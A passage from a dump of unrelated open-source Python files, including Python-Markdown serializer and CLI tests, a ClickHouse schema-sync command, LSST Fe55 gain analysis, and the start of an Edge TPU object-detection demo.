self.assertEqual(list(slc), ['b', 'a'])
def testGetIndexForName(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r.get_index_for_name('a'), 1)
self.assertEqual(r.get_index_for_name('b'), 0)
with self.assertRaises(ValueError):
r.get_index_for_name('c')
def testRegisterDupplicate(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b1'), 'b', 10)
self.assertEqual(list(r), ['a', 'b1'])
self.assertEqual(len(r), 2)
r.register(Item('b2'), 'b', 30)
self.assertEqual(len(r), 2)
self.assertEqual(list(r), ['b2', 'a'])
class TestErrors(unittest.TestCase):
""" Test Error Reporting. """
def setUp(self):
# Set warnings to be raised as errors
warnings.simplefilter('error')
def tearDown(self):
# Reset warning behavior back to default
warnings.simplefilter('default')
def testBadOutputFormat(self):
""" Test failure on bad output_format. """
self.assertRaises(KeyError, markdown.Markdown, output_format='invalid')
def testLoadExtensionFailure(self):
""" Test failure of an extension to load. """
self.assertRaises(
ImportError,
markdown.Markdown, extensions=['non_existant_ext']
)
def testLoadBadExtension(self):
""" Test loading of an Extension with no makeExtension function. """
self.assertRaises(AttributeError, markdown.Markdown, extensions=['markdown.util'])
def testNonExtension(self):
""" Test loading a non Extension object as an extension. """
self.assertRaises(TypeError, markdown.Markdown, extensions=[object])
def testDotNotationExtensionWithBadClass(self):
""" Test Extension loading with non-existent class name (`path.to.module:Class`). """
self.assertRaises(
AttributeError,
markdown.Markdown,
extensions=['markdown.extensions.footnotes:MissingExtension']
)
def testBaseExtention(self):
""" Test that the base Extension class will raise NotImplemented. """
self.assertRaises(
NotImplementedError,
markdown.Markdown, extensions=[markdown.extensions.Extension()]
)
class testETreeComments(unittest.TestCase):
"""
Test that ElementTree Comments work.
These tests should only be a concern when using cElementTree with third
party serializers (including markdown's (x)html serializer). While markdown
doesn't use ElementTree.Comment itself, we should certainly support any
third party extensions which may. Therefore, these tests are included to
ensure such support is maintained.
"""
def setUp(self):
# Create comment node
self.comment = etree.Comment('foo')
def testCommentIsComment(self):
""" Test that an ElementTree Comment passes the `is Comment` test. """
self.assertIs(self.comment.tag, etree.Comment)
def testCommentIsBlockLevel(self):
""" Test that an ElementTree Comment is recognized as BlockLevel. """
md = markdown.Markdown()
self.assertIs(md.is_block_level(self.comment.tag), False)
def testCommentSerialization(self):
""" Test that an ElementTree Comment serializes properly. """
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->'
)
def testCommentPrettify(self):
""" Test that an ElementTree Comment is prettified properly. """
pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
pretty.run(self.comment)
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->\n'
)
class testElementTailTests(unittest.TestCase):
""" Element Tail Tests """
def setUp(self):
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
def testBrTailNoNewline(self):
""" Test that last <br> in tree has a new line tail """
root = etree.Element('root')
br = etree.SubElement(root, 'br')
self.assertEqual(br.tail, None)
self.pretty.run(root)
self.assertEqual(br.tail, "\n")
class testElementPreCodeTests(unittest.TestCase):
""" Element PreCode Tests """
def setUp(self):
md = markdown.Markdown()
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(md)
def prettify(self, xml):
root = etree.fromstring(xml)
self.pretty.run(root)
return etree.tostring(root, encoding="unicode", short_empty_elements=False)
def testPreCodeEmpty(self):
xml = "<pre><code></code></pre>"
expected = "<pre><code></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithChildren(self):
xml = "<pre><code> <span /></code></pre>"
expected = "<pre><code> <span></span></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithSpaceOnly(self):
xml = "<pre><code> </code></pre>"
expected = "<pre><code>\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithText(self):
xml = "<pre><code> hello</code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithTrailingSpace(self):
xml = "<pre><code> hello </code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
class testSerializers(unittest.TestCase):
""" Test the html and xhtml serializers. """
def testHtml(self):
""" Test HTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo <&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_html_string(el),
'<div id="foo<&">">'
'<p hidden>foo <&escaped></p>'
'<hr>'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testXhtml(self):
"""" Test XHTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo<&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div id="foo<&">">'
'<p hidden="hidden">foo<&escaped></p>'
'<hr />'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testMixedCaseTags(self):
"""" Test preservation of tag case. """
el = etree.Element('MixedCase')
el.text = 'not valid '
em = etree.SubElement(el, 'EMPHASIS')
em.text = 'html'
etree.SubElement(el, 'HR')
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<MixedCase>not valid <EMPHASIS>html</EMPHASIS><HR /></MixedCase>'
)
def testProsessingInstruction(self):
""" Test serialization of ProcessignInstruction. """
pi = ProcessingInstruction('foo', text='<&"test\nescaping">')
self.assertIs(pi.tag, ProcessingInstruction)
self.assertEqual(
markdown.serializers.to_xhtml_string(pi),
'<?foo <&"test\nescaping">?>'
)
def testQNameTag(self):
""" Test serialization of QName tag. """
div = etree.Element('div')
qname = etree.QName('http://www.w3.org/1998/Math/MathML', 'math')
math = etree.SubElement(div, qname)
math.set('display', 'block')
sem = etree.SubElement(math, 'semantics')
msup = etree.SubElement(sem, 'msup')
mi = etree.SubElement(msup, 'mi')
mi.text = 'x'
mn = etree.SubElement(msup, 'mn')
mn.text = '2'
ann = etree.SubElement(sem, 'annotations')
ann.text = 'x^2'
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div>'
'<math display="block" xmlns="http://www.w3.org/1998/Math/MathML">'
'<semantics>'
'<msup>'
'<mi>x</mi>'
'<mn>2</mn>'
'</msup>'
'<annotations>x^2</annotations>'
'</semantics>'
'</math>'
'</div>'
)
def testQNameAttribute(self):
""" Test serialization of QName attribute. """
div = etree.Element('div')
div.set(etree.QName('foo'), etree.QName('bar'))
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div foo="bar"></div>'
)
def testBadQNameTag(self):
""" Test serialization of QName with no tag. """
qname = etree.QName('http://www.w3.org/1998/Math/MathML')
el = etree.Element(qname)
self.assertRaises(ValueError, markdown.serializers.to_xhtml_string, el)
def testQNameEscaping(self):
""" Test QName escaping. """
qname = etree.QName('<&"test\nescaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def testQNamePreEscaping(self):
""" Test QName that is already partially escaped. """
qname = etree.QName('<&"test escaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def buildExtension(self):
""" Build an extension which registers fakeSerializer. """
def fakeSerializer(elem):
# Ignore input and return hardcoded output
return '<div><p>foo</p></div>'
class registerFakeSerializer(markdown.extensions.Extension):
def extendMarkdown(self, md):
md.output_formats['fake'] = fakeSerializer
return registerFakeSerializer()
def testRegisterSerializer(self):
self.assertEqual(
markdown.markdown(
'baz', extensions=[self.buildExtension()], output_format='fake'
),
'<p>foo</p>'
)
def testXHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='xhtml'),
'<p>foo<br />\nbar</p>'
)
def testHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='html'),
'<p>foo<br>\nbar</p>'
)
class testAtomicString(unittest.TestCase):
""" Test that AtomicStrings are honored (not parsed). """
def setUp(self):
md = markdown.Markdown()
self.inlineprocessor = md.treeprocessors['inline']
def testString(self):
""" Test that a regular string is parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = 'some *text*'
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some <em>text</em></p></div>'
)
def testSimpleAtomicString(self):
""" Test that a simple AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('some *text*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some *text*</p></div>'
)
def testNestedAtomicString(self):
""" Test that a nested AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('*some* ')
span1 = etree.SubElement(p, 'span')
span1.text = markdown.util.AtomicString('*more* ')
span2 = etree.SubElement(span1, 'span')
span2.text = markdown.util.AtomicString('*text* ')
span3 = etree.SubElement(span2, 'span')
span3.text = markdown.util.AtomicString('*here*')
span3.tail = markdown.util.AtomicString(' *to*')
span2.tail = markdown.util.AtomicString(' *test*')
span1.tail = markdown.util.AtomicString(' *with*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>*some* <span>*more* <span>*text* <span>*here*</span> '
'*to*</span> *test*</span> *with*</p></div>'
)
class TestConfigParsing(unittest.TestCase):
def assertParses(self, value, result):
self.assertIs(markdown.util.parseBoolValue(value, False), result)
def testBooleansParsing(self):
self.assertParses(True, True)
self.assertParses('novalue', None)
self.assertParses('yES', True)
self.assertParses('FALSE', False)
self.assertParses(0., False)
self.assertParses('none', False)
def testPreserveNone(self):
self.assertIsNone(markdown.util.parseBoolValue('None', preserve_none=True))
self.assertIsNone(markdown.util.parseBoolValue(None, preserve_none=True))
def testInvalidBooleansParsing(self):
self.assertRaises(ValueError, markdown.util.parseBoolValue, 'novalue')
class TestCliOptionParsing(unittest.TestCase):
""" Test parsing of Command Line Interface Options. """
def setUp(self):
self.default_options = {
'input': None,
'output': None,
'encoding': None,
'output_format': 'xhtml',
'lazy_ol': True,
'extensions': [],
'extension_configs': {},
}
self.tempfile = ''
def tearDown(self):
if os.path.isfile(self.tempfile):
os.remove(self.tempfile)
def testNoOptions(self):
options, logging_level = parse_options([])
self.assertEqual(options, self.default_options)
self.assertEqual(logging_level, CRITICAL)
def testQuietOption(self):
options, logging_level = parse_options(['-q'])
self.assertGreater(logging_level, CRITICAL)
def testVerboseOption(self):
options, logging_level = parse_options(['-v'])
self.assertEqual(logging_level, WARNING)
def testNoisyOption(self):
options, logging_level = parse_options(['--noisy'])
self.assertEqual(logging_level, DEBUG)
def testInputFileOption(self):
options, logging_level = parse_options(['foo.txt'])
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testOutputFileOption(self):
options, logging_level = parse_options(['-f', 'foo.html'])
self.default_options['output'] = 'foo.html'
self.assertEqual(options, self.default_options)
def testInputAndOutputFileOptions(self):
options, logging_level = parse_options(['-f', 'foo.html', 'foo.txt'])
self.default_options['output'] = 'foo.html'
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testEncodingOption(self):
options, logging_level = parse_options(['-e', 'utf-8'])
self.default_options['encoding'] = 'utf-8'
self.assertEqual(options, self.default_options)
def testOutputFormatOption(self):
options, logging_level = parse_options(['-o', 'html'])
self.default_options['output_format'] = 'html'
self.assertEqual(options, self.default_options)
def testNoLazyOlOption(self):
options, logging_level = parse_options(['-n'])
self.default_options['lazy_ol'] = False
self.assertEqual(options, self.default_options)
def testExtensionOption(self):
options, logging_level = parse_options(['-x', 'markdown.extensions.footnotes'])
self.default_options['extensions'] = ['markdown.extensions.footnotes']
self.assertEqual(options, self.default_options)
def testMultipleExtensionOptions(self):
options, logging_level = parse_options([
'-x', 'markdown.extensions.footnotes',
'-x', 'markdown.extensions.smarty'
])
self.default_options['extensions'] = [
'markdown.extensions.footnotes',
'markdown.extensions.smarty'
]
self.assertEqual(options, self.default_options)
def create_config_file(self, config):
""" Helper to create temp config files. """
if not isinstance(config, str):
# convert to string
config = yaml.dump(config)
fd, self.tempfile = tempfile.mkstemp('.yml')
with os.fdopen(fd, 'w') as fp:
fp.write(config)
def testExtensionConfigOption(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def textBoolExtensionConfigOption(self):
config = {
'markdown.extensions.toc': {
'title': 'Some Title',
'anchorlink': True,
'permalink': True
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionAsJSON(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
import json
self.create_config_file(json.dumps(config))
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionMissingFile(self):
self.assertRaises(IOError, parse_options, ['-c', 'missing_file.yaml'])
def testExtensionConfigOptionBadFormat(self):
config = """
[footnotes]
PLACE_MARKER= ~~~footnotes~~~
"""
self.create_config_file(config)
self.assertRaises(yaml.YAMLError, parse_options, ['-c', self.tempfile])
class TestEscapeAppend(unittest.TestCase):
""" Tests escape character append. """
def testAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.ESCAPED_CHARS.append('|')
self.assertEqual('|' in md.ESCAPED_CHARS, True)
md2 = markdown.Markdown()
self.assertEqual('|' not in md2.ESCAPED_CHARS, True)
class TestBlockAppend(unittest.TestCase):
""" Tests block kHTML append. """
def testBlockAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.block_level_elements.append('test')
self.assertEqual('test' in md.block_level_elements, True)
md2 = markdown.Markdown()
self.assertEqual('test' not in md2.block_level_elements, True)
class TestAncestorExclusion(unittest.TestCase):
""" Tests exclusion of tags in ancestor list. """
class AncestorExample(markdown.inlinepatterns.SimpleTagInlineProcessor):
""" Ancestor Test. """
ANCESTOR_EXCLUDES = ('a',)
def handleMatch(self, m, data):
""" Handle match. """
el = etree.Element(self.tag)
el.text = m.group(2)
return el, m.start(0), m.end(0)
class AncestorExtension(markdown.Extension):
def __init__(self, *args, **kwargs):
"""Initialize."""
self.config = {}
def extendMarkdown(self, md):
"""Modify inline patterns."""
pattern = r'(\+)([^\+]+)\1'
md.inlinePatterns.register(TestAncestorExclusion.AncestorExample(pattern, 'strong'), 'ancestor-test', 0)
def setUp(self):
"""Setup markdown object."""
self.md = markdown.Markdown(extensions=[TestAncestorExclusion.AncestorExtension()])
def test_ancestors(self):
""" Test that an extension can exclude parent tags. """
test = """
Some +test+ and a [+link+](http://test.com)
"""
result = """<p>Some <strong>test</strong> and a <a href="http://test.com">+link+</a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
def test_ancestors_tail(self):
""" Test that an extension can exclude parent tags when dealing with a tail. """
test = """
[***+em+*+strong+**](http://test.com)
"""
result = """<p><a href="http://test.com"><strong><em>+em+</em>+strong+</strong></a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
|
the-stack_0_3781 | import re
from collections import defaultdict
from typing import Dict, Set
import structlog
from django.conf import settings
from django.core.management.base import BaseCommand
from ee.clickhouse.sql.schema import CREATE_TABLE_QUERIES, get_table_name
from posthog.client import sync_execute
logger = structlog.get_logger(__name__)
TableName = str
Query = str
HostName = str
class Command(BaseCommand):
help = "Synchronize schema across clickhouse cluster, creating missing tables on new nodes"
def add_arguments(self, parser):
parser.add_argument(
"--dry-run", action="store_true", help="Exits with a non-zero status if schema changes would be required."
)
def handle(self, *args, **options):
if not settings.CLICKHOUSE_REPLICATION or settings.MULTI_TENANCY:
logger.info("✅ Skipping non-replicated or cloud setup")
return
host_tables, create_table_queries, out_of_sync_hosts = self.analyze_cluster_tables()
if len(out_of_sync_hosts) > 0:
logger.info("Schema out of sync on some clickhouse nodes!", out_of_sync_hosts=out_of_sync_hosts)
if options.get("dry_run"):
exit(1)
else:
self.create_missing_tables(out_of_sync_hosts, create_table_queries)
logger.info("✅ All ClickHouse nodes schema in sync")
def analyze_cluster_tables(self):
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
rows = sync_execute(
"""
SELECT hostName() as host, name, create_table_query
FROM clusterAllReplicas(%(cluster)s, system, tables)
WHERE database = %(database)s
AND name IN %(table_names)s
""",
{
"cluster": settings.CLICKHOUSE_CLUSTER,
"database": settings.CLICKHOUSE_DATABASE,
"table_names": table_names,
},
)
host_tables: Dict[HostName, Set[TableName]] = defaultdict(set)
create_table_queries: Dict[TableName, Query] = {}
for host, table_name, create_table_query in rows:
host_tables[host].add(table_name)
create_table_queries[table_name] = create_table_query
return host_tables, create_table_queries, self.get_out_of_sync_hosts(host_tables)
def get_out_of_sync_hosts(self, host_tables: Dict[HostName, Set[TableName]]) -> Dict[HostName, Set[TableName]]:
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
out_of_sync = {}
for host, tables in host_tables.items():
missing_tables = set(table_names) - tables
if len(missing_tables) > 0:
out_of_sync[host] = missing_tables
return out_of_sync
def create_missing_tables(
self, out_of_sync_hosts: Dict[HostName, Set[TableName]], create_table_queries: Dict[TableName, Query]
):
missing_tables = set(table for tables in out_of_sync_hosts.values() for table in tables)
logger.info("Creating missing tables", missing_tables=missing_tables)
for table in missing_tables:
query = create_table_queries[table]
sync_execute(self.run_on_cluster(query))
def run_on_cluster(self, create_table_query: Query) -> Query:
return re.sub(
r"^CREATE TABLE (\S+)",
f"CREATE TABLE IF NOT EXISTS \\1 ON CLUSTER '{settings.CLICKHOUSE_CLUSTER}'",
create_table_query,
1,
)
|
the-stack_0_3782 | from os.path import join, dirname
import mock
import pytest
from .base import all_products, active_products
from .. import environment
from .. import products
test_paths = {"/": {"tests_path": join(dirname(__file__), "..", "..", "..", "..")}} # repo root
environment.do_delayed_imports(None, test_paths)
@active_products("product")
def test_load_active_product(product):
"""test we can successfully load the product of the current testenv"""
products.Product({}, product)
# test passes if it doesn't throw
@all_products("product")
def test_load_all_products(product):
"""test every product either loads or throws ImportError"""
try:
products.Product({}, product)
except ImportError:
pass
@active_products("product", marks={
"sauce": pytest.mark.skip("needs env extras kwargs"),
})
def test_server_start_config(product):
product_data = products.Product({}, product)
env_extras = product_data.get_env_extras()
with mock.patch.object(environment.serve, "start") as start:
with environment.TestEnvironment(test_paths,
1,
False,
False,
None,
product_data.env_options,
{"type": "none"},
env_extras):
start.assert_called_once()
args = start.call_args
config = args[0][1]
if "server_host" in product_data.env_options:
assert config["server_host"] == product_data.env_options["server_host"]
else:
assert config["server_host"] == config["browser_host"]
assert isinstance(config["bind_address"], bool)
|
the-stack_0_3783 | def valid_parentheses(string):
result=[char for char in string if char in "()"]
comp=-1
total=len(result)
if len(result)%2==1:
return False
index=0
while True:
if total==0:
return True
if index>=total-1:
index=0
total=len(result)
if comp==total:
return False
comp=total
if result[index+1]==")" and result[index]=="(":
del result[index:index+2]
total-=2
index+=1 |
the-stack_0_3786 | """Class to analyze the gains from fe55 cluster fitting"""
import numpy as np
from lsst.eotest.sensor import Fe55GainFitter
from lsst.eo_utils.base.defaults import ALL_SLOTS
from lsst.eo_utils.base.config_utils import EOUtilOptions
from lsst.eo_utils.base.data_utils import TableDict, vstack_tables
from lsst.eo_utils.base.factory import EO_TASK_FACTORY
from lsst.eo_utils.fe55.meta_analysis import Fe55RaftTableAnalysisConfig,\
Fe55RaftTableAnalysisTask,\
Fe55SummaryAnalysisConfig, Fe55SummaryAnalysisTask
class Fe55GainStatsConfig(Fe55RaftTableAnalysisConfig):
"""Configuration for Fe55GainStatsTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-clusters')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-stats')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainStatsTask(Fe55RaftTableAnalysisTask):
"""Analyze the gains using the fe55 cluster fit results"""
ConfigClass = Fe55GainStatsConfig
_DefaultName = "Fe55GainStatsTask"
plot_names = ['gain']
def extract(self, butler, data, **kwargs):
"""Extract the gains and widths from the f355 clusters
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
use_all = self.config.use_all
data_dict = dict(kalpha_peak=[],
kalpha_sigma=[],
ncluster=[],
ngood=[],
gain=[],
gain_error=[],
fit_xmin=[],
fit_xmax=[],
fit_pars=[],
fit_nbins=[],
sigmax_median=[],
sigmay_median=[],
slot=[],
amp=[])
self.log_info_raft_msg(self.config, "")
for islot, slot in enumerate(ALL_SLOTS):
self.log_progress(" %s" % slot)
basename = data[slot]
dtables = TableDict(basename)
for amp in range(16):
table = dtables['amp%02i' % (amp+1)]
if use_all:
mask = np.ones((len(table)), bool)
else:
mask = (np.fabs(table['XPOS'] - table['XPEAK']) < 1)*\
(np.fabs(table['YPOS'] - table['YPEAK']) < 1)
tablevals = table[mask]['DN']
gainfitter = Fe55GainFitter(tablevals)
try:
kalpha_peak, kalpha_sigma = gainfitter.fit(bins=100)
gain = gainfitter.gain
gain_error = gainfitter.gain_error
pars = gainfitter.pars
except Exception:
kalpha_peak, kalpha_sigma = (np.nan, np.nan)
gain = np.nan
gain_error = np.nan
pars = np.nan * np.ones((4))
data_dict['kalpha_peak'].append(kalpha_peak)
data_dict['kalpha_sigma'].append(kalpha_sigma)
data_dict['gain'].append(gain)
data_dict['gain_error'].append(gain_error)
xra = gainfitter.xrange
data_dict['ncluster'].append(mask.size)
data_dict['ngood'].append(mask.sum())
if xra is None:
data_dict['fit_xmin'].append(np.nan)
data_dict['fit_xmax'].append(np.nan)
else:
data_dict['fit_xmin'].append(xra[0])
data_dict['fit_xmax'].append(xra[1])
data_dict['fit_pars'].append(pars)
data_dict['fit_nbins'].append(100.)
data_dict['sigmax_median'].append(np.median(table['SIGMAX']))
data_dict['sigmay_median'].append(np.median(table['SIGMAY']))
data_dict['slot'].append(islot)
data_dict['amp'].append(amp)
self.log_progress("Done!")
outtables = TableDict()
outtables.make_datatable("fe55_gain_stats", data_dict)
return outtables
def plot(self, dtables, figs, **kwargs):
"""Plot the gain results from the fe55 study
It should use a `TableDict` object to create a set of
plots and fill a `FigureDict` object
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_stats']
figs.plot_stat_color('gain', sumtable['gain'].reshape(9, 16))
class Fe55GainSummaryConfig(Fe55SummaryAnalysisConfig):
"""Configuration for Fe55GainSummaryTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-gain-stats')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-sum')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainSummaryTask(Fe55SummaryAnalysisTask):
"""Sumarize the results of the Fe55 gain analyses"""
ConfigClass = Fe55GainSummaryConfig
_DefaultName = "Fe55GainSummaryTask"
plot_names = ['gain', 'sigmax', 'fgood']
def extract(self, butler, data, **kwargs):
"""Make a summry table of the fe55 data
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
for key, val in data.items():
data[key] = val.replace('_fe55-gain-sum.fits', '_fe55-gain-stats.fits')
remove_cols = ['fit_pars']
if not self.config.skip:
outtable = vstack_tables(data, tablename='fe55_gain_stats',
remove_cols=remove_cols)
dtables = TableDict()
dtables.add_datatable('fe55_gain_sum', outtable)
dtables.make_datatable('runs', dict(runs=sorted(data.keys())))
return dtables
def plot(self, dtables, figs, **kwargs):
"""Plot the summary data from the fe55 study
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_sum']
runtable = dtables['runs']
yvals = sumtable['gain'].flatten().clip(0., 2.)
yerrs = sumtable['gain_error'].flatten().clip(0., 0.5)
runs = runtable['runs']
figs.plot_run_chart("gain", runs, yvals, yerrs=yerrs, ylabel="Gain")
yvals = sumtable['sigmax_median'].flatten().clip(0., 2.)
figs.plot_run_chart("sigmax", runs, yvals, ylabel="Cluster width [pixels]")
yvals = sumtable['ngood']/sumtable['ncluster']
figs.plot_run_chart("fgood", runs, yvals, ylabel="Fraction of good clusters")
EO_TASK_FACTORY.add_task_class('Fe55GainStats', Fe55GainStatsTask)
EO_TASK_FACTORY.add_task_class('Fe55GainSummary', Fe55GainSummaryTask)
|
the-stack_0_3787 | import os
import shutil
N = 6
data_root = "/media/data/umutlu/AIC20_track4/"
original_image_folder = data_root + "test_ori_images/"
subset_folder = data_root + "subset_test_ori_images/"
for i in range(1, 101):
org_video_folder = original_image_folder + str(i) + "/"
subset_video_folder = subset_folder + str(i) + "/"
os.makedirs(subset_video_folder, exist_ok=True)
files = os.listdir(org_video_folder)
f = 1
while f < len(files):
shutil.copyfile(org_video_folder + str(f) + ".jpg", subset_video_folder + str(f) + ".jpg")
f += N
print("Video " + str(i) + " is done.")
|
the-stack_0_3788 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A demo which runs object detection on camera frames.
export TEST_DATA=/usr/lib/python3/dist-packages/edgetpu/test_data
Run face detection model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
Run coco model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--labels ${TEST_DATA}/coco_labels.txt
"""
import argparse
import collections
import colorsys
import itertools
import time
from pytz import utc,timezone
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
import datetime
import time
from edgetpu.detection.engine import DetectionEngine
from . import svg
from . import utils
from .apps import run_app
CSS_STYLES = str(svg.CssStyle({'.back': svg.Style(fill='black',
stroke='black',
stroke_width='0.5em'),
'.bbox': svg.Style(fill_opacity=0.0,
stroke_width='0.1em')}))
BBox = collections.namedtuple('BBox', ('x', 'y', 'w', 'h'))
BBox.area = lambda self: self.w * self.h
BBox.scale = lambda self, sx, sy: BBox(x=self.x * sx, y=self.y * sy,
w=self.w * sx, h=self.h * sy)
BBox.__str__ = lambda self: 'BBox(x=%.2f y=%.2f w=%.2f h=%.2f)' % self
Object = collections.namedtuple('Object', ('id', 'label', 'score', 'bbox'))
Object.__str__ = lambda self: 'Object(id=%d, label=%s, score=%.2f, %s)' % self
#cred = credentials.Certificate('/usr/lib/python3/dist-packages/edgetpuvision/serviceAccount.json')
#firebase_admin.initialize_app(cred)
#db = firestore.client()
def size_em(length):
return '%sem' % str(0.6 * (length + 1))
def color(i, total):
return tuple(int(255.0 * c) for c in colorsys.hsv_to_rgb(i / total, 1.0, 1.0))
def make_palette(keys):
return {key : svg.rgb(color(i, len(keys))) for i, key in enumerate(keys)}
def make_get_color(color, labels):
if color:
return lambda obj_id: color
if labels:
palette = make_palette(labels.keys())
return lambda obj_id: palette[obj_id]
return lambda obj_id: 'white'
def overlay(title, objs, get_color, inference_time, inference_rate, layout):
x0, y0, width, height = layout.window
font_size = 0.03 * height
defs = svg.Defs()
defs += CSS_STYLES
doc = svg.Svg(width=width, height=height,
viewBox='%s %s %s %s' % layout.window,
font_size=font_size, font_family='monospace', font_weight=500)
doc += defs
for obj in objs:
percent = int(100 * obj.score)
if obj.label:
caption = '%d%% %s' % (percent, obj.label)
else:
caption = '%d%%' % percent
x, y, w, h = obj.bbox.scale(*layout.size)
color = get_color(obj.id)
doc += svg.Rect(x=x, y=y, width=w, height=h,
style='stroke:%s' % color, _class='bbox')
doc += svg.Rect(x=x, y=y+h ,
width=size_em(len(caption)), height='1.2em', fill=color)
t = svg.Text(x=x, y=y+h, fill='black')
t += svg.TSpan(caption, dy='1em')
doc += t
ox = x0 + 20
oy1, oy2 = y0 + 20 + font_size, y0 + height - 20
# Title
if title:
doc += svg.Rect(x=0, y=0, width=size_em(len(title)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, oy1), _class='back')
